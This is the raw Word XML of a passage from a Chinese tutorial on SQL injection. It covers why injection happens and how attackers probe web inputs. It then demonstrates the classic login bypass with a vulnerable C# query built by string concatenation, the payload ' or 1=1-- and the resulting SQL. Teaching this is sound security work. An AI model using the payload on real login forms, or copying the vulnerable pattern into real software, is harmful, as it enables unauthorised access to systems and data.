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3A0A" w14:textId="77777777" w:rsidR="00884779" w:rsidRDefault="007530D9" w:rsidP="00A33737">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Web入侵先遣—SQL注入攻击技术初探</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEA6433" w14:textId="77777777" w:rsidR="00A33737" w:rsidRPr="00A33737" w:rsidRDefault="00A33737" w:rsidP="00A33737">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E12FF2C" w14:textId="77777777" w:rsidR="001D2955" w:rsidRPr="00884779" w:rsidRDefault="001D2955"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SQL注入式攻击技术，一般针对基于Web平台的应用程序.造成SQL注入攻击漏洞的原因，是由于程序员在编写Web程序时，没有对浏览器端提交的参数进行严格的过滤和判断。用户可以修改构造参数，提交SQL查询语句，并传递至服务器端，从而获取想要的</w:t>
      </w:r>
      <w:r w:rsidR="00CE4CA1" w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>敏</w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>感信息，甚至执行危险的代码或系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D42490" w14:textId="77777777" w:rsidR="001D2955" w:rsidRPr="00884779" w:rsidRDefault="001D2955"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虽然SQL注入攻击技术早已出现，但是时至今日仍然有很大一部分网站存在SQL注入漏洞，在本</w:t>
      </w:r>
      <w:r w:rsidR="001921B6" w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>章</w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开篇中进行的入侵检测中就发现了</w:t>
      </w:r>
      <w:r w:rsidR="001921B6" w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>各</w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>大门户网站同样存在SQL注入漏洞，更别说一些小网站了。由于SQL漏润存在的普遍性，因此SQL入侵攻击技术往往成为黑客入侵攻击网站渗透内部服务的首选技术，其危害性非常大。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8B592A" w14:textId="77777777" w:rsidR="00294B8F" w:rsidRPr="00884779" w:rsidRDefault="001D2955"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下面对目前的各种流行SQL注入攻击技术进行总结，以便网络安全管理人员和工作者更加深入地了解这种攻击与防御方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE88A95" w14:textId="77777777" w:rsidR="00F62C1D" w:rsidRPr="00E11144" w:rsidRDefault="00F62C1D" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E11144">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>注射式攻击的原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A194660" w14:textId="2168C678" w:rsidR="00F62C1D" w:rsidRDefault="00F62C1D"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注射式攻击的根源在于，程序命令和用户数据（即用户输入）之间没有做到泾渭分明。这使得攻击者有机会将程序命令当作用户输入的数据提交给We</w:t>
      </w:r>
      <w:r w:rsidR="006A1E47">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序，以发号施</w:t>
      </w:r>
      <w:r w:rsidR="00E11144" w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>令，为所欲为(注：</w:t>
      </w:r>
      <w:r w:rsidR="00E11144" w:rsidRPr="00FF1DB2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注入最终是数据库，与脚本、平台</w:t>
      </w:r>
      <w:r w:rsidR="003756DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、数据库类型</w:t>
      </w:r>
      <w:r w:rsidR="00E11144" w:rsidRPr="00FF1DB2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无关</w:t>
      </w:r>
      <w:r w:rsidR="00E11144" w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ADBF52" w14:textId="77777777" w:rsidR="00FF1DB2" w:rsidRPr="00FF1DB2" w:rsidRDefault="00FF1DB2"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总之一句话:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A11753">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注入产生的原因是接受相关参数未经处理直接带入数据库查询操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12917C97" w14:textId="77777777" w:rsidR="00F62C1D" w:rsidRPr="00884779" w:rsidRDefault="00F62C1D"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为了发动注射攻击，攻击者需要在常规输入中混入将被解释为命令的“数据”，要想成功，必须要做三件事情：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7265717D" w14:textId="77777777" w:rsidR="00F62C1D" w:rsidRPr="00A33737" w:rsidRDefault="00F62C1D" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A33737">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>确定Web应用程序所使用的技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BFB0F0" w14:textId="77777777" w:rsidR="00F62C1D" w:rsidRPr="00884779" w:rsidRDefault="00F62C1D"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注射式攻击对程序设计语言或者硬件关系密切，但是这些可以通过适当的踩点或者索性将所有常见的注射式攻击都搬出来逐个试一下就知道了。为了确定所采用的技术，攻击者可以考察Web页面的页脚，查看错误页面，检查页面源代码，或者使用诸如Nessus</w:t>
      </w:r>
      <w:r w:rsidR="00AA581F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、AWVS、APPSCAN</w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等工具来进行刺探。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF3A9A6" w14:textId="77777777" w:rsidR="00F62C1D" w:rsidRPr="006443AF" w:rsidRDefault="00F62C1D" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006443AF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>确定所有可能的输入方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC02391" w14:textId="77777777" w:rsidR="00F62C1D" w:rsidRPr="00884779" w:rsidRDefault="00F62C1D"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Web应用的用户输入方式比较多，其中一些用户输入方式是很明显的，如HTML表单；另外，攻击者可以通过隐藏的HTML表单输入、HTTP头部、cookies、甚至对用户不可见的后端AJAX请求来跟Web应用进行交互。一般来说，所有HTTP的GET和POST都应当作用户输入。为了找出一个Web应用所有可能的用户输入，我们可以求助于Web代理，如Burp等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5821387B" w14:textId="77777777" w:rsidR="00F62C1D" w:rsidRPr="006443AF" w:rsidRDefault="00F62C1D" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006443AF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>查找可以用于注射的用户输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D80B97A" w14:textId="77777777" w:rsidR="00F62C1D" w:rsidRDefault="00F62C1D" w:rsidP="001215FE">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在找出所有用户输入方式后，就要对这些输入方式进行筛选，找出其中可以注入命令的那些输入方式。这个任务好像有点难，但是这里有一个小窍门，那就是多多留意Web应用的错误页面，很多时候您能从这里得到意想不到的收获。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E583B4A" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00C37A81" w:rsidRDefault="007D0922" w:rsidP="007D0922">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>经典</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37A81">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>OR漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>原理解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E741AD" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00C37A81" w:rsidRDefault="007D0922" w:rsidP="007D0922">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"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大家经常听到网站万能密码登录，今天我们就来分析分析万能密码是怎么回事。先给大家来一个简单的实例:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CF61BC" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00C37A81" w:rsidRDefault="007D0922" w:rsidP="007D0922">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37A81">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1.登录页面关键代码如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>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firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="185"/>
        <w:gridCol w:w="7630"/>
      </w:tblGrid>
      <w:tr w:rsidR="007D0922" w:rsidRPr="00C52312" w14:paraId="361C7BCD" w14:textId="77777777" w:rsidTr="00D8479D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0C0C0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0C0C0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0C0C0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0C0C0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="35" w:type="dxa"/>
              <w:left w:w="35" w:type="dxa"/>
              <w:bottom w:w="35" w:type="dxa"/>
              <w:right w:w="35" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69E56BF8"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1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="216C00E8"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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="476B88C4"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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="036AA1CC"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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CCDB360"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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A67406A" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00C52312" w:rsidRDefault="007D0922" w:rsidP="00D8479D">
            <w:pPr>
              <w:ind w:firstLine="360"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
                <w:color w:val="454545"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C52312">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
                <w:color w:val="454545"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0C0C0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0C0C0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0C0C0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0C0C0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="35" w:type="dxa"/>
              <w:left w:w="35" w:type="dxa"/>
              <w:bottom w:w="35" w:type="dxa"/>
              <w:right w:w="35" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="161F1AD8"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 xml:space="preserve">privateboolNoProtectLogin(stringName, stringpassword) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42559F5E"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 xml:space="preserve">{ </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69CFBD40"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 xml:space="preserve">intcount = (int)SqlHelper.Instance.ExecuteScalar(string.Format </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="619C33DD"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 xml:space="preserve">("SELECT COUNT(*) FROM Login WHERE Name='{0}' AND Password='{1}'", Name, password)); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="407E898A"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 xml:space="preserve">returncount &gt; 0 ? true: false; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="516F4E52" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00C52312" w:rsidRDefault="007D0922" w:rsidP="00D8479D">
            <w:pPr>
              <w:ind w:firstLine="360"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
                <w:color w:val="454545"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E3DEF">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="454545"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DC64368" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00884779" w:rsidRDefault="007D0922" w:rsidP="007D0922">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方法中Name和 password 是没有经过任何处理，直接拿前端传入的数据，这样拼接的SQL会存在注入漏洞。（帐户：yuan  123）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A14E81D" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00A33737" w:rsidRDefault="007D0922" w:rsidP="007D0922">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="422"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A33737">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1)输入正常数据，效果如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1979C6" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00E73788" w:rsidRDefault="007D0922" w:rsidP="007D0922">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E39AE74" wp14:editId="45E65E59">
            <wp:extent cx="5273592" cy="2794406"/>
            <wp:effectExtent l="19050" t="0" r="3258"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794786"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F618795" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00884779" w:rsidRDefault="007D0922" w:rsidP="007D0922">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>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lastRenderedPageBreak/>
        <w:t>合并的SQL为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>select * from Admin where name='yuan' and passWord='123'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B331F" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00A33737" w:rsidRDefault="007D0922" w:rsidP="007D0922">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="422"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A33737">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2)输入注入数据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C051DDB" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00884779" w:rsidRDefault="007D0922" w:rsidP="007D0922">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如图，即用户名为：用户名：'or 1=1--，密码可随便输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B571C1F" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00E73788" w:rsidRDefault="007D0922" w:rsidP="007D0922">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="420" w:firstLine="300"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31BE5DBD" wp14:editId="6F1EFA97">
            <wp:extent cx="4872914" cy="3269895"/>
            <wp:effectExtent l="19050" t="0" r="3886" b="0"/>
            <wp:docPr id="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5481" cy="3271618"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DEA8A2" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00884779" w:rsidRDefault="007D0922" w:rsidP="007D0922">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合并的SQL为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F7FA62" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00884779" w:rsidRDefault="007D0922" w:rsidP="007D0922">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SELECT * FROM admin WHERE Name='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>or 1=1--'and Password='mima'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4D6FE5" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="00074D5E" w:rsidRDefault="007D0922" w:rsidP="007D0922">
      <w:pPr>
        <w:widowControl w:val="0"/>
